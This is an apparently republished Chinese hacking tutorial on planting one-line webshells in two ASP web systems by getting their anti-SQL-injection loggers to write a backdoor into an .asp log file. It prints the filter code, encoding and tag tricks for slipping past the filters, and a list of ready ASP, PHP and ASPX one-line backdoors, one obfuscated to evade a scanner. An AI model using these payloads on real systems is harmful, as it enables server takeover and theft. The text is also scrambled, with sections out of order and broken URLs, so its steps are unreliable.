對于目前流行的sql注入,程序員在編寫程序時(shí),都普遍的加入防注入程序,有些防注入程序只要在我們提交一些非法的參數(shù)后,就會自動的記錄下你的IP地址,提交的非法參數(shù)和動作等,同時(shí)也把非法提交的數(shù)據(jù)寫入了系統(tǒng)的后綴為ASP的文件中,這也給了我們一些可利用的地方,大家知道,一句話馬就是利用程序過濾的不完全而寫入的,按照這思路,我們是否可以在提交非法參數(shù)中加入一句話馬而防注入程序就會記錄我們提交的數(shù)據(jù)和一句話馬并寫入數(shù)據(jù)庫,從而得到一個(gè)WEBSHELL呢?呵呵,答案是肯定的,但對于要寫入的一句話馬如何繞過過濾的程序,卻是個(gè)難題,常見的一句話馬格式為”<%execute request(“a”)%>,而<%%>就很難繞過HTML的過濾, 但我們可以通過不同的方法來繞過,下面我分別以二個(gè)系統(tǒng)來講解:

打開”http://127.0.0.1/2005/sia-log.asp，出現(xiàn)了”類型不匹配:’execute’,顯示內(nèi)部錯(cuò)誤的IE選項(xiàng)顯示好友錯(cuò)誤鉤掉就可以了。我們再用一句話客戶端來接連上傳后成功得到一個(gè)WEBSHELL。

例二:再談?wù)?rdquo; 快樂視聽音樂網(wǎng) V4.0版本”系統(tǒng)的利用和分析:

系統(tǒng)加強(qiáng)防sql注入, 取消Asp頁面, 對不友好的IP或IP段進(jìn)行封鎖。自動封注入者Ip功能，使注入者不能再訪問本站！可后臺管理、顯示系統(tǒng)界面。當(dāng)在參數(shù)后提交非法數(shù)據(jù)時(shí),系統(tǒng)自動記錄你的IP地址,提交的非法參數(shù)和動作等,然后系統(tǒng)屏蔽了你的IP地址，
讓你再無法訪問網(wǎng)站。我們先看下防注入sql.asp文件中的部分代碼，讀過防注入代碼的人一眼就能看出來這個(gè)文件是個(gè)修改版的。

<%
‘——–說明——————
‘SQL防注入加強(qiáng)版
‘——–數(shù)據(jù)庫連接部分————–
dim dbkillSql,killSqlconn,connkillSql
dbkillSql="data/#sql.asp"
‘On Error Resume Next
Set killSqlconn = Server.CreateObject("ADODB.Connection")
connkillSql="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath(dbkillSql)
killSqlconn.Open connkillSql
If Err Then
 err.Clear
 Set killSqlconn = Nothing
Response.Write "數(shù)據(jù)庫連接出錯(cuò)，請檢查連接字串。"
 Response.End
End If
‘——–定義部份——————
Dim Fy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh,Fy_db,Fy_dbstr,Kill_IP,WriteSql
‘自定義需要過濾的字串,用 "|" 分隔
Fy_In = "’|;|and|(|)|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare"
Kill_IP=True
WriteSql=True  以下略過
在sql.asp文件中,對下面出現(xiàn)在”|”分隔中的字符進(jìn)行了攔截:
Fy_In = "’|;|and|(|)|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare"

也就說明了只有提交這些出現(xiàn)在”|”分隔的被過濾的字符串,才會被防注入系統(tǒng)寫入數(shù)據(jù)庫中而且是被寫入到data目錄中的#sql.asp文件中,其后綴為.asp的,剛好可以被我們利用,

同樣的道理,當(dāng)你提交"<%execute request(chr(97))%>時(shí),%被過濾了

我們把一句話小馬加密成"<%25execute request(chr(97))%25>"還是被過濾了,因?yàn)?還是存在我們把一句話改成"<script runat=server language=vbscript>eval request(chr(97))</script>這樣整句中就沒有出現(xiàn)“%“，提交后則成功完整的被寫入

用一句話客戶端連接并提交成功得到WEBSHELL。如果連接出錯(cuò)，換個(gè)一句話連接工具laker2的不錯(cuò)。

總結(jié):

以上只是對這二個(gè)系統(tǒng)出現(xiàn)的漏洞一個(gè)方面的分析和利用,當(dāng)然這類系統(tǒng)也存在著其它方面的漏洞如cookie的注入

例一西亞購物系統(tǒng)的利用和分析:

“西亞購物系統(tǒng)做了全面性安全處理, ‘數(shù)據(jù)庫防下載處理/CONN防止暴庫處理/防止跨站腳本攻擊/SQL注入式攻擊防范/禁止脫機(jī)瀏覽工具/前臺登陸驗(yàn)證碼/后臺登陸驗(yàn)證碼/

‘會員密碼MD5加密/管理員密碼MD5加密/數(shù)據(jù)來源安全性監(jiān)測/sql注入代碼過濾/HTML代碼過濾及防護(hù)/管理員登陸日至記錄/攻擊記錄及惡意IP屏蔽/非法操作代碼日至記錄/吧安全網(wǎng) “

當(dāng)我們在參數(shù)提交非法參數(shù)時(shí),彈出防注入的頁面
大家看到這時(shí)我們已轉(zhuǎn)到”http://127.0.0.1/2005/Error.asp?allquery=id=381’的這個(gè)頁面上了我們來看conn.asp文件中部分防注入的代碼，代碼太長就貼點(diǎn)關(guān)鍵，百度老說老子文章長

if InStr(allquery,"%20")<>0 or InStr(allquery,"%27")<>0 or InStr(allquery,"’")<>0 or InStr(allquery,"%a1a1")<>0 or InStr(allquery,"%24")<>0 or InStr(allquery,"$")<>0 or InStr(allquery,"%3b")<>0 or InStr(allquery,";")<>0 or InStr(allquery,":")<>0 or InStr(allquery,"%%")<>0 or InStr(allquery,"%3c")<>0 or InStr(allquery,"<")<>0 or InStr(allquery,">")<>0 or InStr(allquery,"–")<>0 or InStr(allquery,"sp_")<>0 or InStr(allquery,"xp_")<>0 or InStr(allquery,"exec")<>0 or InStr(allquery,"/")<>0 or InStr(allquery,"delete")<>0 or InStr(allquery,"dir")<>0 or InStr(allquery,"exe")<>0 or InStr(allquery,"select")<>0 or InStr(allquery,"Update")<>0 or InStr(allquery,"cmd")<>0 or InStr(allquery,"*")<>0 or InStr(allquery,"^")<>0 or InStr(allquery,"(")<>0 or InStr(allquery,")")<>0 or InStr(allquery,"+")<>0 or InStr(allquery,"copy")<>0 or InStr(allquery,"format")<>0 then%>

對提交的非法數(shù)據(jù)中包含以上被搜索到的字符串的話,就自動跳轉(zhuǎn)到”Error.asp的頁面去,而在”Error.asp文件中有以下部分代碼:

toppath = Server.Mappath("sia-log.asp")
Set fs = CreateObject("scripting.filesystemobject")
If Not Fs.FILEEXISTS(toppath) Then
Set Ts = fs.createtextfile(toppath, True)
.
.
Set Ts= Fs.OpenTextFile(toppath,1)
Do While Not Ts.AtEndOfStream
Errorlog = Errorlog & Ts.ReadLine & chr(13) & chr(10)

當(dāng)你提交非法數(shù)據(jù)時(shí),程序就會獲得你的IP,并創(chuàng)建一個(gè)FSO對象,再利用FSO對象自動創(chuàng)建sia_log.asp文件,并將非法提交的字符寫入文件中

打開” http://127.0.0.1/2005/sia-log.aspp頁面，則看到文件記錄了我們剛才提交的數(shù)據(jù),如圖:

這說明我們剛才的提交的非法參數(shù)已寫入了這個(gè)文件中,

3:那么,我們在這個(gè)頁面的參數(shù)后插入一句話如何
卻沒有彈出相應(yīng)的對話框,說明沒有寫入到sia-log.as這個(gè)文件中,我們把地址換成” http://127.0.0.1/2005/Error.asp?allquery=id=381”再來試試,如圖

提交后彈出我們希望看到的頁面。

可我們再打開”sia-log.asp”文件卻看到小馬被過濾了成<execute request(“a”)> %號和"都過濾了。從這兒,我們知道%被過濾掉了而小寫a旁雙引號被轉(zhuǎn)換了,大家自己比較下,好了,知道這點(diǎn),我們就可以重新構(gòu)造我們的小馬了。其實(shí)繞過這個(gè)還是很簡單的。因?yàn)橐痪湓拰懛ê芏唷?/p>

備份專用

<%eval(request("a")):response.end%>

asp一句話
<%execute(request("1"))%>

php一句話

<?php eval($_POST[1]);?>

aspx一句話

<script language="C#" runat="server">
WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10");
</script>

可以躲過雷客圖的一句話。

<%
set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
ms.Language="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.ExecuteStatement("ev"&"al(request(""1""))")
%>

不用'<,>’的asp一句話

<script language=VBScript runat=server>execute request("1")</script>

不用雙引號的一句話。

<%eval request(chr(35))%>

這里我就用工具搗鼓一下，打開”注入字符轉(zhuǎn)換器”這款工具,把”<%” ,“execute 和request之間的空格及”(“a”)%>”相應(yīng)的進(jìn)行轉(zhuǎn)換,這樣原一句話馬就被加密成” %3C%25execute+request%28%22%61%22%29%25%3E” 或轉(zhuǎn)換成<%25execute request(chr(97))%25>,分別提交后,我們打開sia-log.asp文件后,可以清楚看到,二次提交的一句馬都成功的被寫入到sia_log.asp文件中了，

版權(quán)聲明：本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站，禁止在非maisonbaluchon.cn所屬的服務(wù)器上建立鏡像，否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來，僅供學(xué)習(xí)參考，不代表本站立場，如有內(nèi)容涉嫌侵權(quán)，請聯(lián)系alex-e#qq.com處理。